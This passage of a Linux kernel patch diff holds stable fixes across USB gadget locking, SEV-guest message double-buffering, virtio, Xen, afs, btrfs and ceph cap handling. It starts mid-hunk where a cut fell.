++	if (udc->vbus && udc->started)
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
+ }
+ 
+ /**
+@@ -1072,10 +1116,12 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
++	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		usb_udc_connect_control_locked(udc);
+ 	}
++	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1097,7 +1143,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1154,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1175,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1184,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,6 +1347,7 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1496,11 +1549,15 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1588,14 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1681,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
+diff --git a/drivers/usb/gadget/udc/renesas_usb3.c b/drivers/usb/gadget/udc/renesas_usb3.c
+index 615ba0a6fbee1..32c9e369216c9 100644
+--- a/drivers/usb/gadget/udc/renesas_usb3.c
++++ b/drivers/usb/gadget/udc/renesas_usb3.c
+@@ -2596,6 +2596,7 @@ static int renesas_usb3_remove(struct platform_device *pdev)
+ 	debugfs_remove_recursive(usb3->dentry);
+ 	device_remove_file(&pdev->dev, &dev_attr_role);
+ 
++	cancel_work_sync(&usb3->role_work);
+ 	usb_role_switch_unregister(usb3->role_sw);
+ 
+ 	usb_del_gadget_udc(&usb3->gadget);
+diff --git a/drivers/usb/gadget/udc/tegra-xudc.c b/drivers/usb/gadget/udc/tegra-xudc.c
+index 76919d7570d23..3c7ffb35c35cd 100644
+--- a/drivers/usb/gadget/udc/tegra-xudc.c
++++ b/drivers/usb/gadget/udc/tegra-xudc.c
+@@ -2160,7 +2160,7 @@ static int tegra_xudc_gadget_vbus_draw(struct usb_gadget *gadget,
+ 
+ 	dev_dbg(xudc->dev, "%s: %u mA\n", __func__, m_a);
+ 
+-	if (xudc->curr_usbphy->chg_type == SDP_TYPE)
++	if (xudc->curr_usbphy && xudc->curr_usbphy->chg_type == SDP_TYPE)
+ 		ret = usb_phy_set_power(xudc->curr_usbphy, m_a);
+ 
+ 	return ret;
+diff --git a/drivers/usb/host/xhci-debugfs.c b/drivers/usb/host/xhci-debugfs.c
+index dc832ddf7033f..bd40caeeb21c6 100644
+--- a/drivers/usb/host/xhci-debugfs.c
++++ b/drivers/usb/host/xhci-debugfs.c
+@@ -133,6 +133,7 @@ static void xhci_debugfs_regset(struct xhci_hcd *xhci, u32 base,
+ 	regset->regs = regs;
+ 	regset->nregs = nregs;
+ 	regset->base = hcd->regs + base;
++	regset->dev = hcd->self.controller;
+ 
+ 	debugfs_create_regset32((const char *)rgs->name, 0444, parent, regset);
+ }
+diff --git a/drivers/usb/host/xhci-rcar.c b/drivers/usb/host/xhci-rcar.c
+index aef0258a7160d..98525704be9d4 100644
+--- a/drivers/usb/host/xhci-rcar.c
++++ b/drivers/usb/host/xhci-rcar.c
+@@ -75,7 +75,6 @@ MODULE_FIRMWARE(XHCI_RCAR_FIRMWARE_NAME_V3);
+ 
+ /* For soc_device_attribute */
+ #define RCAR_XHCI_FIRMWARE_V2   BIT(0) /* FIRMWARE V2 */
+-#define RCAR_XHCI_FIRMWARE_V3   BIT(1) /* FIRMWARE V3 */
+ 
+ static const struct soc_device_attribute rcar_quirks_match[]  = {
+ 	{
+@@ -147,8 +146,6 @@ static int xhci_rcar_download_firmware(struct usb_hcd *hcd)
+ 
+ 	if (quirks & RCAR_XHCI_FIRMWARE_V2)
+ 		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V2;
+-	else if (quirks & RCAR_XHCI_FIRMWARE_V3)
+-		firmware_name = XHCI_RCAR_FIRMWARE_NAME_V3;
+ 	else
+ 		firmware_name = priv->firmware_name;
+ 
+diff --git a/drivers/usb/mtu3/mtu3_qmu.c b/drivers/usb/mtu3/mtu3_qmu.c
+index 2ea3157ddb6e2..e65586147965d 100644
+--- a/drivers/usb/mtu3/mtu3_qmu.c
++++ b/drivers/usb/mtu3/mtu3_qmu.c
+@@ -210,6 +210,7 @@ static struct qmu_gpd *advance_enq_gpd(struct mtu3_gpd_ring *ring)
+ 	return ring->enqueue;
+ }
+ 
++/* @dequeue may be NULL if ring is unallocated or freed */
+ static struct qmu_gpd *advance_deq_gpd(struct mtu3_gpd_ring *ring)
+ {
+ 	if (ring->dequeue < ring->end)
+@@ -484,7 +485,7 @@ static void qmu_done_tx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+@@ -523,7 +524,7 @@ static void qmu_done_rx(struct mtu3 *mtu, u8 epnum)
+ 	dev_dbg(mtu->dev, "%s EP%d, last=%p, current=%p, enq=%p\n",
+ 		__func__, epnum, gpd, gpd_current, ring->enqueue);
+ 
+-	while (gpd != gpd_current && !GET_GPD_HWO(gpd)) {
++	while (gpd && gpd != gpd_current && !GET_GPD_HWO(gpd)) {
+ 
+ 		mreq = next_request(mep);
+ 
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index b7657984dd8df..6f532da59e08a 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -819,11 +819,7 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 	}
+-	/* If we are in the middle of batch processing, delay the free
+-	 * of AS until BATCH_END.
+-	 */
+-	if (!v->in_batch && !iotlb->nmaps)
+-		vhost_vdpa_remove_as(v, asid);
++
+ }
+ 
+ static int vhost_vdpa_va_map(struct vhost_vdpa *v,
+@@ -1080,8 +1076,6 @@ static int vhost_vdpa_process_iotlb_msg(struct vhost_dev *dev, u32 asid,
+ 		if (v->in_batch && ops->set_map)
+ 			ops->set_map(vdpa, asid, iotlb);
+ 		v->in_batch = false;
+-		if (!iotlb->nmaps)
+-			vhost_vdpa_remove_as(v, asid);
+ 		break;
+ 	default:
+ 		r = -EINVAL;
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index a9df8ee798102..51fbf02a03430 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -514,9 +514,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 	/* get clock */
+ 	ctrl->clk = devm_clk_get(ctrl->dev, mi->clk_name);
+ 	if (IS_ERR(ctrl->clk)) {
++		ret = PTR_ERR(ctrl->clk);
+ 		dev_err_probe(ctrl->dev, ret,
+ 			      "unable to get clk %s\n", mi->clk_name);
+-		ret = -ENOENT;
+ 		goto failed;
+ 	}
+ 	clk_prepare_enable(ctrl->clk);
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 741d12f75726c..9e172f66a8edb 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -46,7 +46,15 @@ struct snp_guest_dev {
+ 
+ 	void *certs_data;
+ 	struct snp_guest_crypto *crypto;
++	/* request and response are in unencrypted memory */
+ 	struct snp_guest_msg *request, *response;
++
++	/*
++	 * Avoid information leakage by double-buffering shared messages
++	 * in fields that are in regular encrypted memory.
++	 */
++	struct snp_guest_msg secret_request, secret_response;
++
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
+ 	u32 *os_area_msg_seqno;
+@@ -268,14 +276,17 @@ static int dec_payload(struct snp_guest_dev *snp_dev, struct snp_guest_msg *msg,
+ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload, u32 sz)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_guest_msg *resp = snp_dev->response;
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *resp = &snp_dev->secret_response;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *req_hdr = &req->hdr;
+ 	struct snp_guest_msg_hdr *resp_hdr = &resp->hdr;
+ 
+ 	dev_dbg(snp_dev->dev, "response [seqno %lld type %d version %d sz %d]\n",
+ 		resp_hdr->msg_seqno, resp_hdr->msg_type, resp_hdr->msg_version, resp_hdr->msg_sz);
+ 
++	/* Copy response from shared memory to encrypted memory. */
++	memcpy(resp, snp_dev->response, sizeof(*resp));
++
+ 	/* Verify that the sequence counter is incremented by 1 */
+ 	if (unlikely(resp_hdr->msg_seqno != (req_hdr->msg_seqno + 1)))
+ 		return -EBADMSG;
+@@ -299,7 +310,7 @@ static int verify_and_dec_payload(struct snp_guest_dev *snp_dev, void *payload,
+ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8 type,
+ 			void *payload, size_t sz)
+ {
+-	struct snp_guest_msg *req = snp_dev->request;
++	struct snp_guest_msg *req = &snp_dev->secret_request;
+ 	struct snp_guest_msg_hdr *hdr = &req->hdr;
+ 
+ 	memset(req, 0, sizeof(*req));
+@@ -419,13 +430,21 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	if (!seqno)
+ 		return -EIO;
+ 
++	/* Clear shared memory's response for the host to populate. */
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+-	/* Encrypt the userspace provided payload */
++	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+ 	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
++	/*
++	 * Write the fully encrypted request to the shared unencrypted
++	 * request page.
++	 */
++	memcpy(snp_dev->request, &snp_dev->secret_request,
++	       sizeof(snp_dev->secret_request));
++
+ 	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
+ 	if (rc) {
+ 		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
+diff --git a/drivers/virtio/virtio_ring.c b/drivers/virtio/virtio_ring.c
+index 2e7689bb933b8..90d514c141794 100644
+--- a/drivers/virtio/virtio_ring.c
++++ b/drivers/virtio/virtio_ring.c
+@@ -848,6 +848,14 @@ static void virtqueue_disable_cb_split(struct virtqueue *_vq)
+ 
+ 	if (!(vq->split.avail_flags_shadow & VRING_AVAIL_F_NO_INTERRUPT)) {
+ 		vq->split.avail_flags_shadow |= VRING_AVAIL_F_NO_INTERRUPT;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		if (vq->event)
+ 			/* TODO: this is a hack. Figure out a cleaner value to write. */
+ 			vring_used_event(&vq->split.vring) = 0x0;
+@@ -1687,6 +1695,14 @@ static void virtqueue_disable_cb_packed(struct virtqueue *_vq)
+ 
+ 	if (vq->packed.event_flags_shadow != VRING_PACKED_EVENT_FLAG_DISABLE) {
+ 		vq->packed.event_flags_shadow = VRING_PACKED_EVENT_FLAG_DISABLE;
++
++		/*
++		 * If device triggered an event already it won't trigger one again:
++		 * no need to disable.
++		 */
++		if (vq->event_triggered)
++			return;
++
+ 		vq->packed.vring.driver->flags =
+ 			cpu_to_le16(vq->packed.event_flags_shadow);
+ 	}
+@@ -2309,12 +2325,6 @@ void virtqueue_disable_cb(struct virtqueue *_vq)
+ {
+ 	struct vring_virtqueue *vq = to_vvq(_vq);
+ 
+-	/* If device triggered an event already it won't trigger one again:
+-	 * no need to disable.
+-	 */
+-	if (vq->event_triggered)
+-		return;
+-
+ 	if (vq->packed_ring)
+ 		virtqueue_disable_cb_packed(_vq);
+ 	else
+diff --git a/drivers/xen/pcpu.c b/drivers/xen/pcpu.c
+index fd3a644b08559..b3e3d1bb37f3e 100644
+--- a/drivers/xen/pcpu.c
++++ b/drivers/xen/pcpu.c
+@@ -58,6 +58,7 @@ struct pcpu {
+ 	struct list_head list;
+ 	struct device dev;
+ 	uint32_t cpu_id;
++	uint32_t acpi_id;
+ 	uint32_t flags;
+ };
+ 
+@@ -249,6 +250,7 @@ static struct pcpu *create_and_register_pcpu(struct xenpf_pcpuinfo *info)
+ 
+ 	INIT_LIST_HEAD(&pcpu->list);
+ 	pcpu->cpu_id = info->xen_cpuid;
++	pcpu->acpi_id = info->acpi_id;
+ 	pcpu->flags = info->flags;
+ 
+ 	/* Need hold on xen_pcpu_lock before pcpu list manipulations */
+@@ -381,3 +383,21 @@ err1:
+ 	return ret;
+ }
+ arch_initcall(xen_pcpu_init);
++
++#ifdef CONFIG_ACPI
++bool __init xen_processor_present(uint32_t acpi_id)
++{
++	const struct pcpu *pcpu;
++	bool online = false;
++
++	mutex_lock(&xen_pcpu_lock);
++	list_for_each_entry(pcpu, &xen_pcpus, list)
++		if (pcpu->acpi_id == acpi_id) {
++			online = pcpu->flags & XEN_PCPU_FLAGS_ONLINE;
++			break;
++		}
++	mutex_unlock(&xen_pcpu_lock);
++
++	return online;
++}
++#endif
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761a..80ab0154419ec 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -6,7 +6,6 @@
+ # Rewritten to use lists instead of if-statements.
+ # 
+ 
+-obj-$(CONFIG_SYSCTL)		+= sysctls.o
+ 
+ obj-y :=	open.o read_write.o file_table.o super.o \
+ 		char_dev.o stat.o exec.o pipe.o namei.o fcntl.o \
+@@ -49,7 +48,7 @@ obj-$(CONFIG_FS_MBCACHE)	+= mbcache.o
+ obj-$(CONFIG_FS_POSIX_ACL)	+= posix_acl.o
+ obj-$(CONFIG_NFS_COMMON)	+= nfs_common/
+ obj-$(CONFIG_COREDUMP)		+= coredump.o
+-obj-$(CONFIG_SYSCTL)		+= drop_caches.o
++obj-$(CONFIG_SYSCTL)		+= drop_caches.o sysctls.o
+ 
+ obj-$(CONFIG_FHANDLE)		+= fhandle.o
+ obj-y				+= iomap/
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 104df2964225c..f73b2f62afaae 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -274,6 +274,7 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 	loff_t i_size;
+ 	int nr_pages, i;
+ 	int ret;
++	loff_t remote_size = 0;
+ 
+ 	_enter("");
+ 
+@@ -288,6 +289,8 @@ static struct afs_read *afs_read_dir(struct afs_vnode *dvnode, struct key *key)
+ 
+ expand:
+ 	i_size = i_size_read(&dvnode->netfs.inode);
++	if (i_size < remote_size)
++	    i_size = remote_size;
+ 	if (i_size < 2048) {
+ 		ret = afs_bad(dvnode, afs_file_error_dir_small);
+ 		goto error;
+@@ -363,6 +366,7 @@ expand:
+ 			 * buffer.
+ 			 */
+ 			up_write(&dvnode->validate_lock);
++			remote_size = req->file_size;
+ 			goto expand;
+ 		}
+ 
+diff --git a/fs/afs/inode.c b/fs/afs/inode.c
+index 6d3a3dbe49286..5921dd3687e39 100644
+--- a/fs/afs/inode.c
++++ b/fs/afs/inode.c
+@@ -230,6 +230,7 @@ static void afs_apply_status(struct afs_operation *op,
+ 			set_bit(AFS_VNODE_ZAP_DATA, &vnode->flags);
+ 		}
+ 		change_size = true;
++		data_changed = true;
+ 	} else if (vnode->status.type == AFS_FTYPE_DIR) {
+ 		/* Expected directory change is handled elsewhere so
+ 		 * that we can locally edit the directory and save on a
+@@ -449,7 +450,7 @@ static void afs_get_inode_cache(struct afs_vnode *vnode)
+ 				    0 : FSCACHE_ADV_SINGLE_CHUNK,
+ 				    &key, sizeof(key),
+ 				    &aux, sizeof(aux),
+-				    vnode->status.size));
++				    i_size_read(&vnode->netfs.inode)));
+ #endif
+ }
+ 
+@@ -765,6 +766,13 @@ int afs_getattr(struct user_namespace *mnt_userns, const struct path *path,
+ 		if (test_bit(AFS_VNODE_SILLY_DELETED, &vnode->flags) &&
+ 		    stat->nlink > 0)
+ 			stat->nlink -= 1;
++
++		/* Lie about the size of directories.  We maintain a locally
++		 * edited copy and may make different allocation decisions on
++		 * it, but we need to give userspace the server's size.
++		 */
++		if (S_ISDIR(inode->i_mode))
++			stat->size = vnode->netfs.remote_i_size;
+ 	} while (need_seqretry(&vnode->cb_lock, seq));
+ 
+ 	done_seqretry(&vnode->cb_lock, seq);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index fe2fb81da46ba..0cebc203c4ccc 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4050,6 +4050,11 @@ static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
+ 	if (IS_ERR(sa))
+ 		return PTR_ERR(sa);
+ 
++	if (sa->flags & ~BTRFS_SCRUB_SUPPORTED_FLAGS) {
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
+ 	if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
+ 		ret = mnt_want_write_file(file);
+ 		if (ret)
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 795fd6d84bde0..faf1178021123 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -430,7 +430,7 @@ void ceph_reservation_status(struct ceph_fs_client *fsc,
+  *
+  * Called with i_ceph_lock held.
+  */
+-static struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
++struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci, int mds)
+ {
+ 	struct ceph_cap *cap;
+ 	struct rb_node *n = ci->i_caps.rb_node;
+diff --git a/fs/ceph/debugfs.c b/fs/ceph/debugfs.c
+index bec3c4549c07d..3904333fa6c38 100644
+--- a/fs/ceph/debugfs.c
++++ b/fs/ceph/debugfs.c
+@@ -248,14 +248,20 @@ static int metrics_caps_show(struct seq_file *s, void *p)
+ 	return 0;
+ }
+ 
+-static int caps_show_cb(struct inode *inode, struct ceph_cap *cap, void *p)
++static int caps_show_cb(struct inode *inode, int mds, void *p)
+ {
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct seq_file *s = p;
+-
+-	seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
+-		   cap->session->s_mds,
+-		   ceph_cap_string(cap->issued),
+-		   ceph_cap_string(cap->implemented));
++	struct ceph_cap *cap;
++
++	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap)
++		seq_printf(s, "0x%-17llx%-3d%-17s%-17s\n", ceph_ino(inode),
++			   cap->session->s_mds,
++			   ceph_cap_string(cap->issued),
++			   ceph_cap_string(cap->implemented));
++	spin_unlock(&ci->i_ceph_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 27a245d959c0a..54e3c2ab21d22 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -1632,8 +1632,8 @@ static void cleanup_session_requests(struct ceph_mds_client *mdsc,
+  * Caller must hold session s_mutex.
+  */
+ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+-			      int (*cb)(struct inode *, struct ceph_cap *,
+-					void *), void *arg)
++			      int (*cb)(struct inode *, int mds, void *),
++			      void *arg)
+ {
+ 	struct list_head *p;
+ 	struct ceph_cap *cap;
+@@ -1645,6 +1645,8 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 	spin_lock(&session->s_cap_lock);
+ 	p = session->s_caps.next;
+ 	while (p != &session->s_caps) {
++		int mds;
++
+ 		cap = list_entry(p, struct ceph_cap, session_caps);
+ 		inode = igrab(&cap->ci->netfs.inode);
+ 		if (!inode) {
+@@ -1652,6 +1654,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			continue;
+ 		}
+ 		session->s_cap_iterator = cap;
++		mds = cap->mds;
+ 		spin_unlock(&session->s_cap_lock);
+ 
+ 		if (last_inode) {
+@@ -1663,7 +1666,7 @@ int ceph_iterate_session_caps(struct ceph_mds_session *session,
+ 			old_cap = NULL;
+ 		}
+ 
+-		ret = cb(inode, cap, arg);
++		ret = cb(inode, mds, arg);
+ 		last_inode = inode;
+ 
+ 		spin_lock(&session->s_cap_lock);
+@@ -1696,20 +1699,25 @@ out:
+ 	return ret;
+ }
+ 
+-static int remove_session_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-				  void *arg)
++static int remove_session_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	bool invalidate = false;
+-	int iputs;
++	struct ceph_cap *cap;
++	int iputs = 0;
+ 
+-	dout("removing cap %p, ci is %p, inode is %p\n",
+-	     cap, ci, &ci->netfs.inode);
+ 	spin_lock(&ci->i_ceph_lock);
+-	iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	cap = __get_cap_for_mds(ci, mds);
++	if (cap) {
++		dout(" removing cap %p, ci is %p, inode is %p\n",
++		     cap, ci, &ci->netfs.inode);
++
++		iputs = ceph_purge_inode_cap(inode, cap, &invalidate);
++	}
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+-	wake_up_all(&ci->i_cap_wq);
++	if (cap)
++		wake_up_all(&ci->i_cap_wq);
+ 	if (invalidate)
+ 		ceph_queue_invalidate(inode);
+ 	while (iputs--)
+@@ -1780,8 +1788,7 @@ enum {
+  *
+  * caller must hold s_mutex.
+  */
+-static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+-			      void *arg)
++static int wake_up_session_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	unsigned long ev = (unsigned long)arg;
+@@ -1792,12 +1799,14 @@ static int wake_up_session_cb(struct inode *inode, struct ceph_cap *cap,
+ 		ci->i_requested_max_size = 0;
+ 		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == RENEWCAPS) {
+-		if (cap->cap_gen < atomic_read(&cap->session->s_cap_gen)) {
+-			/* mds did not re-issue stale cap */
+-			spin_lock(&ci->i_ceph_lock);
++		struct ceph_cap *cap;
++
++		spin_lock(&ci->i_ceph_lock);
++		cap = __get_cap_for_mds(ci, mds);
++		/* mds did not re-issue stale cap */
++		if (cap && cap->cap_gen < atomic_read(&cap->session->s_cap_gen))
+ 			cap->issued = cap->implemented = CEPH_CAP_PIN;
+-			spin_unlock(&ci->i_ceph_lock);
+-		}
++		spin_unlock(&ci->i_ceph_lock);
+ 	} else if (ev == FORCE_RO) {
+ 	}
+ 	wake_up_all(&ci->i_cap_wq);
+@@ -1959,16 +1968,22 @@ out:
+  * Yes, this is a bit sloppy.  Our only real goal here is to respond to
+  * memory pressure from the MDS, though, so it needn't be perfect.
+  */
+-static int trim_caps_cb(struct inode *inode, struct ceph_cap *cap, void *arg)
++static int trim_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	int *remaining = arg;
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	int used, wanted, oissued, mine;
++	struct ceph_cap *cap;
+ 
+ 	if (*remaining <= 0)
+ 		return -1;
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		return 0;
++	}
+ 	mine = cap->issued | cap->implemented;
+ 	used = __ceph_caps_used(ci);
+ 	wanted = __ceph_caps_file_wanted(ci);
+@@ -3911,26 +3926,22 @@ out_unlock:
+ /*
+  * Encode information about a cap for a reconnect with the MDS.
+  */
+-static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+-			  void *arg)
++static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ {
+ 	union {
+ 		struct ceph_mds_cap_reconnect v2;
+ 		struct ceph_mds_cap_reconnect_v1 v1;
+ 	} rec;
+-	struct ceph_inode_info *ci = cap->ci;
++	struct ceph_inode_info *ci = ceph_inode(inode);
+ 	struct ceph_reconnect_state *recon_state = arg;
+ 	struct ceph_pagelist *pagelist = recon_state->pagelist;
+ 	struct dentry *dentry;
++	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err;
++	int pathlen = 0, err = 0;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+-	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+-	     inode, ceph_vinop(inode), cap, cap->cap_id,
+-	     ceph_cap_string(cap->issued));
+-
+ 	dentry = d_find_primary(inode);
+ 	if (dentry) {
+ 		/* set pathbase to parent dir when msg_version >= 2 */
+@@ -3947,6 +3958,15 @@ static int reconnect_caps_cb(struct inode *inode, struct ceph_cap *cap,
+ 	}
+ 
+ 	spin_lock(&ci->i_ceph_lock);
++	cap = __get_cap_for_mds(ci, mds);
++	if (!cap) {
++		spin_unlock(&ci->i_ceph_lock);
++		goto out_err;
++	}
++	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
++	     inode, ceph_vinop(inode), cap, cap->cap_id,
++	     ceph_cap_string(cap->issued));
++
+ 	cap->seq = 0;        /* reset cap seq */
+ 	cap->issue_seq = 0;  /* and issue_seq */
+ 	cap->mseq = 0;       /* and migrate_seq */
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 0598faa50e2e0..18b026b1ac63f 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -541,8 +541,7 @@ extern void ceph_flush_cap_releases(struct ceph_mds_client *mdsc,
+ extern void ceph_queue_cap_reclaim_work(struct ceph_mds_client *mdsc);
+ extern void ceph_reclaim_caps_nr(struct ceph_mds_client *mdsc, int nr);
+ extern int ceph_iterate_session_caps(struct ceph_mds_session *session,
